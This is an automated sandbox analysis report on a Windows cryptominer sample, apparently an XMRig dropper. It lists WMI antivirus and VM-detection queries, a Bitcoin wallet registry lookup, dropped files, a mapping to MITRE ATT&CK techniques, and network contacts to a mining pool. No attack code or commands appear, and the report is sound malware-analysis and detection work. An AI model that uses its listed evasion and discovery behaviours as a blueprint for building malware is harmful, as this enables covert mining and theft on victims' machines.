          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1776684809.000002DD74555000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1776684809.000002DD74555000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Stealing of Sensitive Information

          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
          MITRE ATT&CK Matrix (techniques listed per tactic column; a number in parentheses is the report's hit-count badge for that technique)

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
          Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
          Execution: Windows Management Instrumentation (331); PowerShell (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
          Persistence: Scripting (1); DLL Side-Loading (1); Windows Service (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
          Privilege Escalation: DLL Side-Loading (1); Windows Service (1); Process Injection (411); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
          Defense Evasion: Disable or Modify Tools (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (441); Process Injection (411); Indicator Removal from Tools; HTML Smuggling; Dynamic API Resolution
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
          Discovery: File and Directory Discovery (1); System Information Discovery (233); Query Registry (1); Security Software Discovery (631); Process Discovery (1); Virtualization/Sandbox Evasion (441); Application Window Discovery (1); System Owner/User Discovery (2); Remote System Discovery (1); System Network Configuration Discovery (1)
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
          Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
          Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (3); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
          Behavior Graph ID: 1611947  Sample: SecuriteInfo.com.Win64.Evo-...  Startdate: 11/02/2025  Architecture: WINDOWS  Score: 100

          Process tree recovered from the behavior graph (indentation shows parent and child; dropped files, network contacts and signatures are listed under the node they are attached to):

          Sample-level signatures: Sigma detected: Xmrig; Suricata IDS alerts for network traffic; Antivirus detection for dropped file; 8 other signatures
          Sample-level DNS/IP: rx-eu-lon.unminable.com; rx.unmineable.com; 4 other IPs or domains

          SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe
            network: 93.88.203.169, ports 39001, 49706, 56001 (DRAVANET-ASHU, Hungary)
            dropped: C:\Users\user\AppData\...\Stamp_Setup.exe (PE32); C:\Users\user\AppData\...\u9KSgzq29lys.bat (DOS)
            signatures: Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines); 2 other signatures
            cmd.exe
              signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
              Stamp_Setup.exe
                dropped: C:\Users\user\AppData\...\Stamp_Setup.tmp (PE32)
                signatures: Multi AV Scanner detection for dropped file
                Stamp_Setup.tmp
                  dropped: C:\Users\user\AppData\Local\...\_shfoldr.dll (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+); C:\Users\user\AppData\Local\...\_isdecmp.dll (PE32)
                  Stamp_Setup.exe
                    dropped: C:\Users\user\AppData\...\Stamp_Setup.tmp (PE32)
                    Stamp_Setup.tmp
                      dropped: C:\Users\user\AppData\Roaming\is-H1DAG.tmp (PE32+); C:\Users\user\AppData\...\9mpr_8.ocx (copy) (PE32+); C:\Users\user\AppData\...\unins000.exe (copy) (PE32); 4 other malicious files
                      regsvr32.exe
                        regsvr32.exe
                          network: github.com 140.82.121.4, ports 443, 65257 (GITHUBUS, United States); raw.githubusercontent.com 185.199.110.133, ports 443, 65259 (FASTLYUS, Netherlands)
                          signatures: System process connects to network (likely due to code injection or exploit); Suspicious powershell command line found; Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); 4 other signatures
                          AddInProcess.exe
                            network: rx-eu-lon.unminable.com 161.35.34.195, ports 3333, 65269, 65270 (DIGITALOCEAN-ASNUS, United States); on this connection: Detected Stratum mining protocol
                            signatures: Query firmware table information (likely to detect VMs)
                          powershell.exe
                            signatures: Loading BitLocker PowerShell Module
                            conhost.exe
                          powershell.exe
                          3 other processes
              conhost.exe
              PING.EXE
              chcp.com
          regsvr32.exe
            signatures: Suspicious powershell command line found
            powershell.exe
              signatures: Loading BitLocker PowerShell Module
              conhost.exe
